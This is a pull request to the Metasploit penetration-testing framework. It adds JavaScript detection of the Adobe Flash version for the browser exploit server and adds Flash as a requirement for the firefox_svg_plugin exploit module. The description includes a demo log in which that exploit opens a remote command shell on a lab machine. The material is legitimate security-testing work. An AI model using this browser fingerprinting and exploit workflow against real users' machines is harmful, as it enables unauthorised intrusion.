### PR TITLE
Add Adobe Flash version detection in JavaScript

### DIFF
--- a/data/js/detect/misc_addons.js
+++ b/data/js/detect/misc_addons.js
@@ -47,6 +47,53 @@ window.misc_addons_detect.hasSilverlight = function () {
 }
 
 /**
+ * Returns the Adobe Flash version
+**/
+window.misc_addons_detect.getFlashVersion = function () {
+	var foundVersion = null;
+
+	//
+	// Gets the Flash version by using the GetVariable function via ActiveX
+	//
+	try {
+		var ax = new ActiveXObject('ShockwaveFlash.ShockwaveFlash').GetVariable('$version').toString();
+		foundVersion = ax.match(/[\d,]+/g)[0].replace(/,/g, '.')
+	} catch (e) {}
+
+	//
+	// This should work fine for most non-IE browsers
+	//
+	if (foundVersion == null) {
+		var mimes = window.navigator.mimeTypes;
+		for (var i=0; i<mimes.length; i++) {
+			var pluginDesc = mimes[i].enabledPlugin.description.toString();
+			var m = pluginDesc.match(/Shockwave Flash [\d\.]+/g);
+			if (m != null) {
+				foundVersion = m[0].match(/\d.+/g)[0];
+				break;
+			}
+		}
+	}
+
+	//
+	// Detection for Windows + Firefox
+	//
+	if (foundVersion == null) {
+		var pluginsCount = navigator.plugins.length;
+		for (i=0; i < pluginsCount; i++) {
+			var pluginName = navigator.plugins[i].name;
+			var pluginVersion = navigator.plugins[i].version;
+			if (/Shockwave Flash/.test(pluginName) && pluginVersion != undefined) {
+				foundVersion = navigator.plugins[i].version;
+				break;
+			}
+		}
+	}
+
+	return foundVersion;
+}
+
+/**
  * Returns the Java version
  **/
 window.misc_addons_detect.getJavaVersion = function () {

--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -56,7 +56,7 @@ module Msf
       :clsid        => 'clsid',        # ActiveX clsid. Also requires the :method key
       :method       => 'method',       # ActiveX method. Also requires the :clsid key
       :mshtml_build => 'mshtml_build', # mshtml build. Example: "65535"
-      :flash        => 'flash'         # Example: "12.0" (chrome/ff) or "12.0.0.111" (IE)
+      :flash        => 'flash'         # Example: "12.0" (chrome/ff) or "12.0.0.77" (IE)
     }
 
     def initialize(info={})

--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -42,20 +42,21 @@ module Msf
 
     # Requirements a browser module can define in either BrowserRequirements or in targets
     REQUIREMENT_KEY_SET = {
-      :source       => 'source',      # Either 'script' or 'headers'
-      :ua_name      => 'ua_name',     # Example: MSIE
-      :ua_ver       => 'ua_ver',      # Example: 8.0, 9.0
-      :os_name      => 'os_name',     # Example: Microsoft Windows
-      :os_flavor    => 'os_flavor',   # Example: XP, 7
-      :language     => 'language',    # Example: en-us
-      :arch         => 'arch',        # Example: x86
-      :proxy        => 'proxy',       # 'true' or 'false'
-      :silverlight  => 'silverlight', # 'true' or 'false'
-      :office       => 'office',      # Example: "2007", "2010"
-      :java         => 'java',        # Example: 1.6, 1.6.0.0
-      :clsid        => 'clsid',       # ActiveX clsid. Also requires the :method key
-      :method       => 'method',      # ActiveX method. Also requires the :clsid key
-      :mshtml_build => 'mshtml_build'  # mshtml build. Example: "65535"
+      :source       => 'source',       # Either 'script' or 'headers'
+      :ua_name      => 'ua_name',      # Example: MSIE
+      :ua_ver       => 'ua_ver',       # Example: 8.0, 9.0
+      :os_name      => 'os_name',      # Example: Microsoft Windows
+      :os_flavor    => 'os_flavor',    # Example: XP, 7
+      :language     => 'language',     # Example: en-us
+      :arch         => 'arch',         # Example: x86
+      :proxy        => 'proxy',        # 'true' or 'false'
+      :silverlight  => 'silverlight',  # 'true' or 'false'
+      :office       => 'office',       # Example: "2007", "2010"
+      :java         => 'java',         # Example: 1.6, 1.6.0.0
+      :clsid        => 'clsid',        # ActiveX clsid. Also requires the :method key
+      :method       => 'method',       # ActiveX method. Also requires the :clsid key
+      :mshtml_build => 'mshtml_build', # mshtml build. Example: "65535"
+      :flash        => 'flash'         # Example: "12.0" (chrome/ff) or "12.0.0.111" (IE)
     }
 
     def initialize(info={})
@@ -222,9 +223,12 @@ module Msf
     # For more info about what the actual value might be for each key, see HttpServer.
     #
     # If the source is 'script', the profile might have even more information about plugins:
-    # 'office'  : The version of Microsoft Office (IE only)
-    # 'activex' : Whether a specific method is available from an ActiveX control (IE only)
-    # 'java'    : The Java version
+    # 'office'       : The version of Microsoft Office (IE only)
+    # 'activex'      : Whether a specific method is available from an ActiveX control (IE only)
+    # 'java'         : The Java version
+    # 'mshtml_build' : The MSHTML build version
+    # 'flash'        : The Flash version
+    # 'silverlight'  : The Silverlight version
     #
     # @param tag [String] Either a cookie or IP + User-Agent
     # @return [Hash] The profile found. If not found, returns nil
@@ -375,7 +379,8 @@ module Msf
           "<%=REQUIREMENT_KEY_SET[:ua_ver]%>"      : osInfo.ua_version,
           "<%=REQUIREMENT_KEY_SET[:arch]%>"        : osInfo.arch,
           "<%=REQUIREMENT_KEY_SET[:java]%>"        : window.misc_addons_detect.getJavaVersion(),
-          "<%=REQUIREMENT_KEY_SET[:silverlight]%>" : window.misc_addons_detect.hasSilverlight()
+          "<%=REQUIREMENT_KEY_SET[:silverlight]%>" : window.misc_addons_detect.hasSilverlight(),
+          "<%=REQUIREMENT_KEY_SET[:flash]%>"       : window.misc_addons_detect.getFlashVersion()
         };
 
         <% if os == OperatingSystems::WINDOWS and client == HttpClients::IE %>

--- a/modules/exploits/multi/browser/firefox_svg_plugin.rb
+++ b/modules/exploits/multi/browser/firefox_svg_plugin.rb
@@ -75,7 +75,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'BrowserRequirements' => {
         :source  => 'script',
         :ua_name => HttpClients::FF,
-        :ua_ver  => /17\..*/
+        :ua_ver  => /17\..*/,
+        :flash   => /[\d.]+/
       }
     ))
 


### PR DESCRIPTION
This adds Adobe Flash version detection in JavaScript. In order to test this, I also updated the firefox_svg_plugin exploit module so you can use it as a test case.
### Verification
- [x] Make sure you have Mozilla Firefox 17: http://www.oldapps.com/firefox.php?old_firefox=8492
- [x] Make sure you have Adobe Flash for FF: http://get.adobe.com/flashplayer/
- [x] Test the firefox_svg_plugin exploit. The browser should pass the exploitable requirements.
- [x] Uninstall Flash on your test box
- [x] Test the exploit again. This time you should be denied because of the `flash` requirement.
### Demo

With Flash:

```
msf exploit(firefox_svg_plugin) > [*] 10.0.1.91        firefox_svg_plugin - Gathering target information.
[*] 10.0.1.91        firefox_svg_plugin - Sending response HTML.
[*] 10.0.1.91        firefox_svg_plugin - Target selected: Universal (Javascript XPCOM Shell)
[*] 10.0.1.91        firefox_svg_plugin - Sending Firefox 17.0.1 Flash Privileged Code Injection
[*] 10.0.1.91        firefox_svg_plugin - Sending .swf trigger.
[*] 10.0.1.91        firefox_svg_plugin - Sending .swf trigger.
[*] Command shell session 1 opened (10.0.1.76:4444 -> 10.0.1.91:49918) at 2014-03-28 15:36:01 -0500
```

Without Flash:

```
msf exploit(firefox_svg_plugin) > [*] 10.0.1.91        firefox_svg_plugin - Gathering target information.
[*] 10.0.1.91        firefox_svg_plugin - Sending response HTML.
[!] 10.0.1.91        firefox_svg_plugin - Exploit requirement(s) not met: flash
```
